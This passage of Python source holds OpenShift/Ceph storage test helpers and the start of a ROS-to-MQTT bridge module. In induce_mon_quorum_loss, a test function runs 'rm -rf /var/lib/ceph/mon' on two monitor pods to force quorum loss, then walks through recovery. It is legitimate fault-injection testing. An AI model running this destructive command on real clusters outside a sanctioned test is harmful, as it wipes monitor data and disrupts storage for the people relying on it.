return disruptions_allowed, min_available_mon, max_unavailable_mon
def verify_pdb_mon(disruptions_allowed, max_unavailable_mon):
"""
Compare between the PDB status and the expected PDB status
Args:
disruptions_allowed (int): the expected number of disruptions_allowed
max_unavailable_mon (int): the expected number of max_unavailable_mon
    Returns:
bool: True if the expected pdb state equal to actual pdb state, False otherwise
"""
logger.info("Check mon pdb status")
mon_pdb = get_mon_pdb()
result = True
if disruptions_allowed != mon_pdb[0]:
result = False
logger.error(
f"The expected disruptions_allowed is: {disruptions_allowed}.The actual one is {mon_pdb[0]}"
)
if max_unavailable_mon != mon_pdb[2]:
result = False
logger.error(
f"The expected max_unavailable_mon is {max_unavailable_mon}.The actual one is {mon_pdb[2]}"
)
return result
@retry(CommandFailed, tries=10, delay=30, backoff=1)
def run_cmd_verify_cli_output(
cmd=None, expected_output_lst=(), cephtool_cmd=False, debug_node=None
):
"""
Run command and verify its output
Args:
cmd(str): cli command
expected_output_lst(set): A set of strings that need to be included in the command output.
cephtool_cmd(bool): command on ceph-tool pod
debug_node(str): name of node
Returns:
        bool: True if all strings are included in the command output, False otherwise
"""
if cephtool_cmd is True:
tool_pod = pod.get_ceph_tools_pod()
cmd_start = f"oc rsh -n openshift-storage {tool_pod.name} "
cmd = f"{cmd_start} {cmd}"
elif debug_node is not None:
cmd_start = f"oc debug nodes/{debug_node} -- chroot /host /bin/bash -c "
cmd = f'{cmd_start} "{cmd}"'
out = run_cmd(cmd=cmd)
logger.info(out)
for expected_output in expected_output_lst:
if expected_output not in out:
return False
return True
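# Illustrative usage sketch: verify cluster health from the ceph tools pod (the expected
# string is an example of what a healthy cluster would report):
#
#     healthy = run_cmd_verify_cli_output(
#         cmd="ceph health",
#         expected_output_lst={"HEALTH_OK"},
#         cephtool_cmd=True,
#     )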
def check_rbd_image_used_size(
pvc_objs, usage_to_compare, rbd_pool=constants.DEFAULT_BLOCKPOOL, expect_match=True
):
"""
Check if RBD image used size of the PVCs are matching with the given value
Args:
pvc_objs (list): List of PVC objects
usage_to_compare (str): Value of image used size to be compared with actual value. eg: "5GiB"
rbd_pool (str): Name of the pool
expect_match (bool): True to verify the used size is equal to 'usage_to_compare' value.
False to verify the used size is not equal to 'usage_to_compare' value.
Returns:
bool: True if the verification is success for all the PVCs, False otherwise
"""
ct_pod = pod.get_ceph_tools_pod()
no_match_list = []
for pvc_obj in pvc_objs:
rbd_image_name = pvc_obj.get_rbd_image_name
du_out = ct_pod.exec_ceph_cmd(
ceph_cmd=f"rbd du -p {rbd_pool} {rbd_image_name}",
format="",
)
used_size = "".join(du_out.strip().split()[-2:])
if expect_match:
if usage_to_compare != used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation."
f" Expected used size: {usage_to_compare}. Actual used size: {used_size}. "
f"Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
else:
if usage_to_compare == used_size:
logger.error(
f"Rbd image {rbd_image_name} of PVC {pvc_obj.name} did not meet the expectation. "
f"Expected the used size to be diferent than {usage_to_compare}. "
f"Actual used size: {used_size}. Rbd du out: {du_out}"
)
no_match_list.append(pvc_obj.name)
if no_match_list:
logger.error(
f"RBD image used size of these PVCs did not meet the expectation - {no_match_list}"
)
return False
return True
def set_configmap_log_level_rook_ceph_operator(value):
"""
Set ROOK_LOG_LEVEL on configmap of rook-ceph-operator
Args:
value (str): type of log
"""
path = "/data/ROOK_LOG_LEVEL"
params = f"""[{{"op": "add", "path": "{path}", "value": "{value}"}}]"""
configmap_obj = OCP(
kind=constants.CONFIGMAP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
resource_name=constants.ROOK_OPERATOR_CONFIGMAP,
)
logger.info(f"Setting ROOK_LOG_LEVEL to: {value}")
configmap_obj.patch(params=params, format_type="json")
def get_logs_rook_ceph_operator():
"""
Get logs from a rook_ceph_operator pod
Returns:
        str: Output of the 'oc logs' command for the rook-ceph-operator pod
"""
logger.info("Get logs from rook_ceph_operator pod")
rook_ceph_operator_objs = pod.get_operator_pods()
return pod.get_pod_logs(pod_name=rook_ceph_operator_objs[0].name)
def check_osd_log_exist_on_rook_ceph_operator_pod(
last_log_date_time_obj, expected_strings=(), unexpected_strings=()
):
"""
Verify logs contain the expected strings and the logs do not
contain the unexpected strings
Args:
        last_log_date_time_obj (datetime obj): the datetime of the last operator log line before the check
expected_strings (list): verify the logs contain the expected strings
unexpected_strings (list): verify the logs do not contain the strings
Returns:
bool: True if logs contain the expected strings and the logs do not
contain the unexpected strings, False otherwise
"""
logger.info("Respin OSD pod")
osd_pod_objs = pod.get_osd_pods()
osd_pod_obj = random.choice(osd_pod_objs)
osd_pod_obj.delete()
new_logs = list()
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj and log_date_time_obj > last_log_date_time_obj:
new_logs.append(line)
res_expected = False
res_unexpected = True
for new_log in new_logs:
if all(
expected_string.lower() in new_log.lower()
for expected_string in expected_strings
):
res_expected = True
logger.info(f"{new_log} contain expected strings {expected_strings}")
break
for new_log in new_logs:
if any(
unexpected_string.lower() in new_log.lower()
for unexpected_string in unexpected_strings
):
logger.error(f"{new_log} contain unexpected strings {unexpected_strings}")
res_unexpected = False
break
return res_expected & res_unexpected
def get_last_log_time_date():
"""
Get last log time
Returns:
        last_log_date_time_obj (datetime obj): the datetime of the last rook-ceph-operator log line
"""
logger.info("Get last log time")
rook_ceph_operator_logs = get_logs_rook_ceph_operator()
for line in rook_ceph_operator_logs.splitlines():
log_date_time_obj = get_event_line_datetime(line)
if log_date_time_obj:
last_log_date_time_obj = log_date_time_obj
return last_log_date_time_obj
def clear_crash_warning_and_osd_removal_leftovers():
"""
Clear crash warnings and osd removal leftovers. This function can be used for example,
after the device replacement test or the node replacement test.
"""
is_deleted = pod.delete_all_osd_removal_jobs()
if is_deleted:
logger.info("Successfully deleted all the ocs-osd-removal jobs")
is_osd_pods_running = pod.wait_for_pods_to_be_running(
pod_names=[osd_pod.name for osd_pod in pod.get_osd_pods()], timeout=120
)
if not is_osd_pods_running:
logger.warning("There are still osds down. Can't clear ceph crash warnings")
return
is_daemon_recently_crash_warnings = run_cmd_verify_cli_output(
cmd="ceph health detail",
expected_output_lst={"HEALTH_WARN", "daemons have recently crashed"},
cephtool_cmd=True,
)
if is_daemon_recently_crash_warnings:
logger.info("Clear all ceph crash warnings")
ct_pod = pod.get_ceph_tools_pod()
ct_pod.exec_ceph_cmd(ceph_cmd="ceph crash archive-all")
else:
logger.info("There are no daemon crash warnings")
def get_noobaa_url():
"""
Get the URL of noobaa console
Returns:
str: url of noobaa console
"""
ocp_obj = OCP(kind=constants.ROUTE, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
route_obj = ocp_obj.get(resource_name="noobaa-mgmt")
return route_obj["spec"]["host"]
def select_unique_pvcs(pvcs):
"""
Get the PVCs with unique access mode and volume mode combination.
Args:
pvcs(list): List of PVC objects
Returns:
list: List of selected PVC objects
"""
pvc_dict = {}
for pvc_obj in pvcs:
pvc_data = pvc_obj.get()
access_mode_volume_mode = (
pvc_data["spec"]["accessModes"][0],
pvc_data["spec"].get("volumeMode"),
)
pvc_dict[access_mode_volume_mode] = pvc_dict.get(
access_mode_volume_mode, pvc_obj
)
return pvc_dict.values()
def mon_pods_running_on_same_node():
"""
    Verifies that no two mons are running on the same node
"""
mon_running_nodes = node.get_mon_running_nodes()
if len(mon_running_nodes) != len(set(mon_running_nodes)):
logger.error(f"Mons running on nodes: {mon_running_nodes}")
raise UnexpectedBehaviour("Two or more mons running on same node")
logger.info("Mons are running on different nodes")
def get_failure_domain():
"""
Get Failure Domain
Returns:
string: type of failure domain
"""
from ocs_ci.ocs.resources.storage_cluster import get_storage_cluster
storage_cluster_obj = get_storage_cluster()
return storage_cluster_obj.data["items"][0]["status"]["failureDomain"]
def modify_statefulset_replica_count(statefulset_name, replica_count):
"""
Function to modify statefulset replica count,
i.e to scale up or down statefulset
Args:
        statefulset_name (str): Name of statefulset
replica_count (int): replica count to be changed to
Returns:
bool: True in case if changes are applied. False otherwise
"""
ocp_obj = OCP(kind=constants.STATEFULSET, namespace=defaults.ROOK_CLUSTER_NAMESPACE)
params = f'{{"spec": {{"replicas": {replica_count}}}}}'
return ocp_obj.patch(resource_name=statefulset_name, params=params)
def get_event_line_datetime(event_line):
"""
Get the event line datetime
Args:
event_line (str): The event line to get it's datetime
Returns:
datetime object: The event line datetime
"""
event_line_dt = None
regex = r"\d{4}-\d{2}-\d{2}"
if re.search(regex + "T", event_line):
dt_string = event_line[:23].replace("T", " ")
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
elif re.search(regex, event_line):
dt_string = event_line[:26]
event_line_dt = datetime.datetime.strptime(dt_string, "%Y-%m-%d %H:%M:%S.%f")
return event_line_dt
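# Illustrative usage sketch: parse the timestamp of a rook-ceph-operator log line
# (the log line below is a made-up example matching the space-separated format branch):
#
#     line = "2021-06-01 12:34:56.789012 I | op-osd: example message"
#     event_dt = get_event_line_datetime(line)  # -> datetime(2021, 6, 1, 12, 34, 56, 789012)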
def get_rook_ceph_pod_events(pod_name):
"""
Get the rook ceph pod events from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
Returns:
list: List of all the event lines with the specific pod
"""
rook_ceph_operator_event_lines = get_logs_rook_ceph_operator().splitlines()
return [line for line in rook_ceph_operator_event_lines if pod_name in line]
def get_rook_ceph_pod_events_by_keyword(pod_name, keyword):
"""
Get the rook ceph pod events with the keyword 'keyword' from the rook ceph pod operator logs
Args:
pod_name (str): The rook ceph pod name to get the events
keyword (str): The keyword to search in the events
Returns:
list: List of all the event lines with the specific pod that has the keyword 'keyword'
"""
pod_event_lines = get_rook_ceph_pod_events(pod_name)
return [
event_line
for event_line in pod_event_lines
if keyword.lower() in event_line.lower()
]
def wait_for_rook_ceph_pod_status(pod_obj, desired_status, timeout=420):
"""
Wait for the rook ceph pod to reach the desired status. If the pod didn't reach the
desired status, check if the reason is that the pod is not found. If this is the case,
check in the rook ceph pod operator logs to see if the pod reached the desired status.
Args:
pod_obj (ocs_ci.ocs.resources.pod.Pod): The rook ceph pod object
desired_status (str): The desired status of the pod to wait for
timeout (int): time to wait for the pod to reach the desired status
Returns:
        bool: True if the rook ceph pod reached the desired status. False otherwise
"""
start_log_datetime = get_last_log_time_date()
try:
wait_for_resource_state(pod_obj, desired_status, timeout=timeout)
except (ResourceWrongStatusException, CommandFailed) as e:
if "not found" in str(e):
logger.info(
f"Failed to find the pod {pod_obj.name}. Trying to search for the event "
f"in rook ceph operator logs..."
)
pod_event_lines_with_desired_status = get_rook_ceph_pod_events_by_keyword(
pod_obj.name, keyword=desired_status
)
last_pod_event_line = pod_event_lines_with_desired_status[-1]
last_pod_event_datetime = get_event_line_datetime(last_pod_event_line)
if last_pod_event_datetime > start_log_datetime:
logger.info(
f"Found the event of pod {pod_obj.name} with status {desired_status} in "
f"rook ceph operator logs. The event line is: {last_pod_event_line}"
)
return True
else:
return False
else:
logger.info(f"An error has occurred when trying to get the pod object: {e}")
return False
return True
def check_number_of_mon_pods(expected_mon_num=3):
"""
    Function to check the number of mon pods
    Args:
        expected_mon_num (int): Expected number of mon pods
    Returns:
        bool: True if the number of mon pods equals expected_mon_num, False otherwise
"""
mon_pod_list = pod.get_mon_pods()
if len(mon_pod_list) == expected_mon_num:
logger.info(f"Number of mons equal to {expected_mon_num}")
return True
logger.error(f"Number of Mons not equal to {expected_mon_num} {mon_pod_list}")
return False
def get_secret_names(namespace=defaults.ROOK_CLUSTER_NAMESPACE, resource_name=""):
"""
Get secrets names
Args:
namespace (str): The name of the project.
resource_name (str): The resource name to fetch.
Returns:
        list: secret names
"""
logger.info(f"Get secret names on project {namespace}")
secret_obj = ocp.OCP(kind=constants.SECRET, namespace=namespace)
secrets_objs = secret_obj.get(resource_name=resource_name)
return [secret_obj["metadata"]["name"] for secret_obj in secrets_objs["items"]]
def check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running():
"""
check rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Returns:
bool: True if the rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running. False otherwise.
"""
logger.info(
"check rook-ceph-crashcollector pods running on worker nodes "
"where rook-ceph pods are running."
)
logger.info(
f"crashcollector nodes: {node.get_crashcollector_nodes()}, "
f"nodes where ocs pods running: {node.get_nodes_where_ocs_pods_running()}"
)
res = sorted(node.get_crashcollector_nodes()) == sorted(
node.get_nodes_where_ocs_pods_running()
)
if not res:
logger.warning(
"rook-ceph-crashcollector pods are not running on worker nodes "
"where rook-ceph pods are running."
)
return res
def verify_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running(timeout=90):
"""
Verify rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running.
Args:
timeout (int): time to wait for verifying
Returns:
bool: True if rook-ceph-crashcollector pods running on worker nodes
where rook-ceph pods are running in the given timeout. False otherwise.
"""
sample = TimeoutSampler(
timeout=timeout,
sleep=10,
func=check_rook_ceph_crashcollector_pods_where_rook_ceph_pods_are_running,
)
return sample.wait_for_func_status(result=True)
def induce_mon_quorum_loss():
"""
Take mon quorum out by deleting /var/lib/ceph/mon directory
so that it will start crashing and the quorum is lost
Returns:
mon_pod_obj_list (list): List of mon objects
mon_pod_running[0] (obj): A mon object which is running
ceph_mon_daemon_id (list): List of crashed ceph mon id
"""
# Get mon pods
mon_pod_obj_list = pod.get_mon_pods()
# rsh into 2 of the mon pod and delete /var/lib/ceph/mon directory
mon_pod_obj = random.sample(mon_pod_obj_list, 2)
mon_pod_running = list(set(mon_pod_obj_list) - set(mon_pod_obj))
for pod_obj in mon_pod_obj:
command = "rm -rf /var/lib/ceph/mon"
try:
pod_obj.exec_cmd_on_pod(command=command)
except CommandFailed as ef:
if "Device or resource busy" not in str(ef):
raise ef
# Get the crashed mon id
ceph_mon_daemon_id = [
pod_obj.get().get("metadata").get("labels").get("ceph_daemon_id")
for pod_obj in mon_pod_obj
]
logger.info(f"Crashed ceph mon daemon id: {ceph_mon_daemon_id}")
# Wait for sometime after the mon crashes
time.sleep(300)
# Check the operator log mon quorum lost
operator_logs = get_logs_rook_ceph_operator()
pattern = (
"op-mon: failed to check mon health. "
"failed to get mon quorum status: mon "
"quorum status failed: exit status 1"
)
logger.info(f"Check the operator log for the pattern : {pattern}")
if not re.search(pattern=pattern, string=operator_logs):
        logger.error(
            f"Pattern {pattern} couldn't be found in the operator logs. "
            "Mon quorum may not have been lost after deleting "
            "/var/lib/ceph/mon. Please check"
        )
        raise UnexpectedBehaviour(
            f"Pattern {pattern} not found in operator logs. "
            "Mon quorum may not have been lost or the mon crash may have failed. Please check"
        )
logger.info(f"Pattern found: {pattern}. Mon quorum lost")
return mon_pod_obj_list, mon_pod_running[0], ceph_mon_daemon_id
def recover_mon_quorum(mon_pod_obj_list, mon_pod_running, ceph_mon_daemon_id):
"""
Recover mon quorum back by following
procedure mentioned in https://access.redhat.com/solutions/5898541
Args:
mon_pod_obj_list (list): List of mon objects
mon_pod_running (obj): A mon object which is running
ceph_mon_daemon_id (list): List of crashed ceph mon id
"""
from ocs_ci.ocs.cluster import is_lso_cluster
# Scale down rook-ceph-operator
logger.info("Scale down rook-ceph-operator")
if not modify_deployment_replica_count(
deployment_name=constants.ROOK_CEPH_OPERATOR, replica_count=0
):
raise CommandFailed("Failed to scale down rook-ceph-operator to 0")
logger.info("Successfully scaled down rook-ceph-operator to 0")
    # Take a backup of the current mon deployment which is running
dep_obj = OCP(
kind=constants.DEPLOYMENT, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE
)
if is_lso_cluster():
mon = mon_pod_running.get().get("metadata").get("labels").get("mon")
mon_deployment_name = f"rook-ceph-mon-{mon}"
else:
mon_deployment_name = (
mon_pod_running.get().get("metadata").get("labels").get("pvc_name")
)
running_mon_pod_yaml = dep_obj.get(resource_name=mon_deployment_name)
# Patch the mon Deployment to run a sleep
# instead of the ceph-mon command
logger.info(
f"Edit mon {mon_deployment_name} deployment to run a sleep instead of the ceph-mon command"
)
params = (
'{"spec": {"template": {"spec": '
'{"containers": [{"name": "mon", "command": ["sleep", "infinity"], "args": []}]}}}}'
)
dep_obj.patch(
resource_name=mon_deployment_name, params=params, format_type="strategic"
)
logger.info(
f"Deployment {mon_deployment_name} successfully set to sleep instead of the ceph-mon command"
)
# Set 'initialDelaySeconds: 2000' so that pod doesn't restart
logger.info(
f"Edit mon {mon_deployment_name} deployment to set 'initialDelaySeconds: 2000'"
)
params = (
'[{"op": "replace", '
'"path": "/spec/template/spec/containers/0/livenessProbe/initialDelaySeconds", "value":2000}]'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params, format_type="json")
logger.info(
f"Deployment {mon_deployment_name} successfully set 'initialDelaySeconds: 2000'"
)
# rsh to mon pod and run commands to remove lost mons
# set a few simple variables
time.sleep(60)
mon_pod_obj = pod.get_mon_pods()
for pod_obj in mon_pod_obj:
if (
is_lso_cluster()
and pod_obj.get().get("metadata").get("labels").get("mon") == mon
):
mon_pod_running = pod_obj
elif (
pod_obj.get().get("metadata").get("labels").get("pvc_name")
== mon_deployment_name
):
mon_pod_running = pod_obj
monmap_path = "/tmp/monmap"
args_from_mon_containers = (
running_mon_pod_yaml.get("spec")
.get("template")
.get("spec")
.get("containers")[0]
.get("args")
)
# Extract the monmap to a file
logger.info("Extract the monmap to a file")
args_from_mon_containers.append(f"--extract-monmap={monmap_path}")
extract_monmap = " ".join(args_from_mon_containers).translate(
"()".maketrans("", "", "()")
)
command = f"ceph-mon {extract_monmap}"
mon_pod_running.exec_cmd_on_pod(command=command)
# Review the contents of monmap
command = f"monmaptool --print {monmap_path}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
# Take a backup of current monmap
backup_of_monmap_path = "/tmp/monmap.current"
logger.info(f"Take a backup of current monmap in location {backup_of_monmap_path}")
command = f"cp {monmap_path} {backup_of_monmap_path}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
# Remove the crashed mon from the monmap
logger.info("Remove the crashed mon from the monmap")
for mon_id in ceph_mon_daemon_id:
command = f"monmaptool {backup_of_monmap_path} --rm {mon_id}"
mon_pod_running.exec_cmd_on_pod(command=command, out_yaml_format=False)
logger.info("Successfully removed the crashed mon from the monmap")
# Inject the monmap back to the monitor
logger.info("Inject the new monmap back to the monitor")
args_from_mon_containers.pop()
args_from_mon_containers.append(f"--inject-monmap={backup_of_monmap_path}")
inject_monmap = " ".join(args_from_mon_containers).translate(
"()".maketrans("", "", "()")
)
command = f"ceph-mon {inject_monmap}"
mon_pod_running.exec_cmd_on_pod(command=command)
args_from_mon_containers.pop()
# Patch the mon deployment to run "mon" command again
logger.info(f"Edit mon {mon_deployment_name} deployment to run mon command again")
params = (
f'{{"spec": {{"template": {{"spec": {{"containers": '
f'[{{"name": "mon", "command": ["ceph-mon"], "args": {json.dumps(args_from_mon_containers)}}}]}}}}}}}}'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params)
logger.info(
f"Deployment {mon_deployment_name} successfully set to run mon command again"
)
# Set 'initialDelaySeconds: 10' back
logger.info(
f"Edit mon {mon_deployment_name} deployment to set again 'initialDelaySeconds: 10'"
)
params = (
'[{"op": "replace", '
'"path": "/spec/template/spec/containers/0/livenessProbe/initialDelaySeconds", "value":10}]'
)
dep_obj.patch(resource_name=mon_deployment_name, params=params, format_type="json")
logger.info(
f"Deployment {mon_deployment_name} successfully set 'initialDelaySeconds: 10'"
)
# Scale up the rook-ceph-operator deployment
logger.info("Scale up rook-ceph-operator")
if not modify_deployment_replica_count(
deployment_name=constants.ROOK_CEPH_OPERATOR, replica_count=1
):
raise CommandFailed("Failed to scale up rook-ceph-operator to 1")
logger.info("Successfully scaled up rook-ceph-operator to 1")
logger.info("Validate rook-ceph-operator pod is running")
pod_obj = OCP(kind=constants.POD, namespace=constants.OPENSHIFT_STORAGE_NAMESPACE)
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
selector=constants.OPERATOR_LABEL,
resource_count=1,
timeout=600,
sleep=5,
)
# Verify all mons are up and running
logger.info("Validate all mons are up and running")
pod_obj.wait_for_resource(
condition=constants.STATUS_RUNNING,
selector=constants.MON_APP_LABEL,
resource_count=len(mon_pod_obj_list),
timeout=1200,
sleep=5,
)
logger.info("All mons are up and running")
def create_reclaim_space_job(
pvc_name,
reclaim_space_job_name=None,
backoff_limit=None,
retry_deadline_seconds=None,
):
"""
Create ReclaimSpaceJob to invoke reclaim space operation on RBD volume
Args:
pvc_name (str): Name of the PVC
reclaim_space_job_name (str): The name of the ReclaimSpaceJob to be created
backoff_limit (int): The number of retries before marking reclaim space operation as failed
retry_deadline_seconds (int): The duration in seconds relative to the start time that the
operation may be retried
Returns:
ocs_ci.ocs.resources.ocs.OCS: An OCS object representing ReclaimSpaceJob
"""
reclaim_space_job_name = (
reclaim_space_job_name or f"reclaimspacejob-{pvc_name}-{uuid4().hex}"
)
job_data = templating.load_yaml(constants.CSI_RBD_RECLAIM_SPACE_JOB_YAML)
job_data["metadata"]["name"] = reclaim_space_job_name
job_data["spec"]["target"]["persistentVolumeClaim"] = pvc_name
if backoff_limit:
job_data["spec"]["backOffLimit"] = backoff_limit
if retry_deadline_seconds:
job_data["spec"]["retryDeadlineSeconds"] = retry_deadline_seconds
ocs_obj = create_resource(**job_data)
return ocs_obj
def create_reclaim_space_cronjob(
pvc_name,
reclaim_space_job_name=None,
backoff_limit=None,
retry_deadline_seconds=None,
schedule="weekly",
):
"""
Create ReclaimSpaceCronJob to invoke reclaim space operation on RBD volume
Args:
pvc_name (str): Name of the PVC
        reclaim_space_job_name (str): The name of the ReclaimSpaceCronJob to be created
backoff_limit (int): The number of retries before marking reclaim space operation as failed
retry_deadline_seconds (int): The duration in seconds relative to the start time that the
operation may be retried
schedule (str): Type of schedule
Returns:
        ocs_ci.ocs.resources.ocs.OCS: An OCS object representing ReclaimSpaceCronJob
"""
reclaim_space_cronjob_name = reclaim_space_job_name or create_unique_resource_name(
pvc_name, f"{constants.RECLAIMSPACECRONJOB}-{schedule}"
)
job_data = templating.load_yaml(constants.CSI_RBD_RECLAIM_SPACE_CRONJOB_YAML)
job_data["metadata"]["name"] = reclaim_space_cronjob_name
job_data["spec"]["jobTemplate"]["spec"]["target"][
"persistentVolumeClaim"
] = pvc_name
if backoff_limit:
job_data["spec"]["jobTemplate"]["spec"]["backOffLimit"] = backoff_limit
if retry_deadline_seconds:
job_data["spec"]["jobTemplate"]["spec"][
"retryDeadlineSeconds"
] = retry_deadline_seconds
if schedule:
job_data["spec"]["schedule"] = "@" + schedule
ocs_obj = create_resource(**job_data)
return ocs_obj
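# A minimal usage sketch for the two helpers above (the PVC name is illustrative and the
# import path is an assumption about where this module lives):
#
#     from ocs_ci.helpers.helpers import (
#         create_reclaim_space_job, create_reclaim_space_cronjob
#     )
#
#     # One-off reclaim space operation on an RBD-backed PVC
#     job = create_reclaim_space_job("my-rbd-pvc", backoff_limit=3, retry_deadline_seconds=300)
#     # Recurring reclaim space operation; schedule="weekly" becomes the cron shorthand "@weekly"
#     cronjob = create_reclaim_space_cronjob("my-rbd-pvc", schedule="weekly")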
def get_cephfs_subvolumegroup():
"""
    Get the name of the cephfilesystemsubvolumegroup. The name is fetched from the
    cluster only on a Managed Service consumer cluster; otherwise the default "csi" is returned.
Returns:
str: The name of cephfilesystemsubvolumegroup
"""
if (
config.ENV_DATA.get("platform", "").lower()
in constants.MANAGED_SERVICE_PLATFORMS
and config.ENV_DATA.get("cluster_type", "").lower() == "consumer"
):
subvolume_group = ocp.OCP(
kind=constants.CEPHFILESYSTEMSUBVOLUMEGROUP,
namespace=constants.OPENSHIFT_STORAGE_NAMESPACE,
)
subvolume_group_obj = subvolume_group.get().get("items")[0]
subvolume_group_name = subvolume_group_obj.get("metadata").get("name")
else:
subvolume_group_name = "csi"
return subvolume_group_name
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
    if isinstance(factory, str):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
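# A minimal sketch of how create_bridge is typically driven from configuration: the factory
# may be the class itself or a "module:attribute" string resolved by lookup_object (the same
# string form this file uses elsewhere for service types). Topic and message-type names below
# are illustrative, and the bridge classes additionally require the inject bindings sketched
# after the Bridge base class below.
#
#     bridge = create_bridge(
#         "mqtt_bridge.bridge:RosToMqttBridge",   # or simply RosToMqttBridge
#         topic_from="/ping",
#         topic_to="ping",
#         msg_type="std_msgs.msg:String",
#     )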
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
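# Bridge subclasses resolve their MQTT client, serializer/deserializer and private-path
# extractor through `inject` bindings rather than constructor arguments. A minimal sketch of
# the configuration they assume (json is used here purely as an illustrative serializer that
# yields bytes; the real deployment may bind msgpack or another codec):
#
#     import json
#     import inject
#     import paho.mqtt.client as mqtt
#
#     def configure_injector(binder):
#         binder.bind(mqtt.Client, mqtt.Client())
#         binder.bind('serializer', lambda msg: json.dumps(msg).encode('utf-8'))
#         binder.bind('deserializer', json.loads)
#         binder.bind('mqtt_private_path_extractor', lambda topic: topic)
#
#     inject.configure(configure_injector)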
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
self._service_topic = control_topic + '/service/request/#'
self._register_service_topic = control_topic + '/service/register/#'
self._mqtt_client.subscribe(self._control_topic, qos=2)
self._mqtt_client.message_callback_add(self._control_topic, self._callback_mqtt_topic)
self._mqtt_client.subscribe(self._service_topic, qos=2)
self._mqtt_client.message_callback_add(self._service_topic, self._callback_mqtt_service)
self._mqtt_client.subscribe(self._register_service_topic, qos=2)
self._mqtt_client.message_callback_add(self._register_service_topic, self._register_service)
self._bridges = set([])
rospy.loginfo('DynamicBridgeServer started on control topic %s' % control_topic)
def _callback_mqtt_service(self, client, userdata, mqtt_msg):
t = Thread(target=self.__callback_mqtt_service, args=(userdata, mqtt_msg))
t.start()
def __callback_mqtt_service(self, userdata, mqtt_msg):
rospy.logdebug("MQTT service call received from {}".format(mqtt_msg.topic))
msg_dict = self._deserialize(mqtt_msg.payload)
service_type = lookup_object(msg_dict['type'])
request_type = lookup_object(msg_dict['type'] + 'Request')
# create request object
request = request_type()
# and populate it
populate_instance(msg_dict['args'], request)
response_type = lookup_object(msg_dict['type'] + 'Response')
# create empty response object
response = response_type()
msg_dict['op'] = 'response'
try:
rospy.logdebug('waiting for service %s' % msg_dict['service'])
rospy.wait_for_service(msg_dict['service'], 1)
service = rospy.ServiceProxy(msg_dict['service'], service_type)
response = service.call(request)
msg_dict['response'] = extract_values(response)
except Exception:
rospy.logerr("Service %s doesn't exist" % msg_dict['service'])
msg_dict['response'] = None
finally:
payload = bytearray(self._serialize(msg_dict))
self._mqtt_client.publish(
topic=msg_dict['response_topic'], payload=payload,
qos=2, retain=False)
def _register_service(self, client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
if msg_dict['op'] == 'register':
rospy.loginfo("register service proxy")
try:
self._bridges.add(RemoteService(
**msg_dict['args'])
)
except rospy.ServiceException as e:
rospy.logerr("Captured exception when trying to register a "
"service twice. This happens when mqtt clients are restarted:"
" %s" % (e,))
def _callback_mqtt_topic(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
def __bridge_exists(args):
for __bridge in self._bridges:
if __bridge._topic_from == args['topic_to'] and\
__bridge._topic_to == args['topic_from']:
return True
return False
if msg_dict['op'] == 'mqtt2ros_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward mqtt topic to ros %s" % (
msg_dict['args']))
self._bridges.add(MqttToRosBridge(
**msg_dict['args'])
)
else:
rospy.loginfo("bridge for %s already initialised" % (
msg_dict['args']))
if msg_dict['op'] == 'ros2mqtt_subscribe':
if not __bridge_exists(msg_dict['args']):
rospy.loginfo("forward ros topic to mqtt %s" % (
msg_dict['args']))
self._bridges.add(RosToMqttBridge(
**msg_dict['args'])
)
else:
rospy.logwarn("bridge for %s already initialised" % (
msg_dict['args']))
class RosToMqttBridge(Bridge):
u""" Bridge from ROS topic to MQTT
:param str topic_from: incoming ROS topic path
:param str topic_to: outgoing MQTT topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param bool latched: retain the last message on the MQTT topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None, latched=False, qos=0):
self._topic_from = topic_from
self._topic_to = self._extract_private_path(topic_to)
self._last_published = rospy.get_time()
